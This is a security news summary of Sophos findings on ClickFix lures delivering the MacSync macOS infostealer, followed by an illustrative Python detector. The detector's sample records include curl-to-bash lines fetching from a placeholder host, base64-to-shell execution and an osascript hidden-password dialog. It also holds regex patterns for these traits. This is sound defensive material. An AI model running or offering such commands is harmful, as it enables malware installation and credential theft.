A technical analysis by Sophos found that three ClickFix campaigns used paste‑into‑Terminal social engineering to deploy a macOS infostealer called MacSync from November 2025 through February 2026.
KEY FACTS
- Incident: Three ClickFix campaigns delivered MacSync to macOS hosts.
- Malware: MacSync is an AppleScript infostealer that exfiltrates credentials, files, keychain data and wallet seed phrases.
- Delivery: Victims were lured to paste and run obfuscated Terminal commands that fetched a shell script and launched the stealer.
- Timeline: Activity ran from November 2025 to February 2026 and targeted multiple regions.
In the November 2025 activity, attackers used sponsored search results with OpenAI Atlas bait to direct users to a fake download page that instructed them to paste a Terminal command.
In December the campaigns used malvertising to link users to shared ChatGPT conversations and then to GitHub‑themed landing pages that prompted the same Terminal action. A February 2026 wave distributed a new MacSync variant that supports dynamic AppleScript and in‑memory execution to evade static analysis and behavioral detections.
The pasted command downloaded a shell script that contacted a hard-coded server to retrieve an AppleScript payload. The script can prompt for the system password, run MacSync with the user's permissions and take steps to remove traces, while exfiltrating credentials, keychain databases, files and wallet seed phrases.
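The chain above (a pasted command that fetches a script, pipes it into a shell, decodes obfuscated content at run time and drives osascript, including a password prompt) leaves recognisable traces in shell command telemetry. The following detector is an added example, not Sophos's tooling or MacSync's code; the rules, weights, threshold and the sample command records are constructed for illustration, and the hostname is a placeholder.

```python
# Heuristic scorer for ClickFix-style paste-into-Terminal chains on macOS.
# Scores shell command records for the traits named in the write-up: a remote
# fetch piped straight into a shell, base64 decoded into a shell, and osascript
# driving a payload or prompting for the user's password. Sample records are
# constructed; weights and threshold are assumptions, not vendor values.
import re
from dataclasses import dataclass

RULES = [  # (name, pattern, weight)
    ("fetch_piped_to_shell", re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z)?sh\b"), 3),
    ("base64_decode_exec", re.compile(r"base64\s+(-d|--decode|-D)[^|;]*\|\s*(ba|z)?sh\b"), 3),
    ("osascript_inline", re.compile(r"\bosascript\b.*\s-e\s"), 2),
    ("password_dialog", re.compile(r"display dialog.*hidden answer", re.I), 2),
    ("background_detach", re.compile(r"\bnohup\b|&\s*$"), 1),
]
# Fetch-pipe-to-shell alone is the "developer installer" pattern the lure abuses,
# so it reaches the threshold by itself; tune upward on hosts where it is normal.
ALERT_THRESHOLD = 3


@dataclass
class Verdict:
    command: str
    score: int
    hits: list


def score_command(cmd: str) -> Verdict:
    """Apply every rule to one command record and sum the matching weights."""
    hits = [name for name, rx, _ in RULES if rx.search(cmd)]
    score = sum(w for name, _, w in RULES if name in hits)
    return Verdict(cmd, score, hits)


def scan(records):
    """Return verdicts at or above ALERT_THRESHOLD, highest score first."""
    verdicts = [score_command(r) for r in records]
    return sorted((v for v in verdicts if v.score >= ALERT_THRESHOLD),
                  key=lambda v: -v.score)


SAMPLE_RECORDS = [  # constructed; example.invalid is a placeholder host
    "curl -fsSL http://example.invalid/setup.sh | bash",
    "nohup curl -fsSL http://example.invalid/update.sh | bash >/dev/null 2>&1 &",
    'echo "ZWNobyBoaQ==" | base64 -D | sh',
    "osascript -e 'display dialog \"Enter password\" default answer \"\" with hidden answer'",
    "brew install wget",
    "ls -la ~/Downloads",
]

if __name__ == "__main__":
    for v in scan(SAMPLE_RECORDS):
        print(v.score, v.hits, v.command)
```

Feed it the command field from shell-history or endpoint process telemetry; the benign records (a package install, a directory listing) score zero, while the pasted-chain records alert.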
Multiple threat actors have adopted ClickFix style lures to deliver a range of stealers and trojans on both macOS and Windows. It is not known whether the three campaigns were run by the same operator.
Site administrators are advised to keep software and plugins up to date, use strong admin passwords and two-factor authentication, and scan for suspicious accounts. Users should avoid pasting unknown commands into Terminal and use reputable security software.
WHY IT MATTERS
The technique exploits a common developer installation pattern to trick users into running malicious commands and targets macOS because it often holds high value credentials and wallet data. Successful infections can lead to credential theft and financial loss.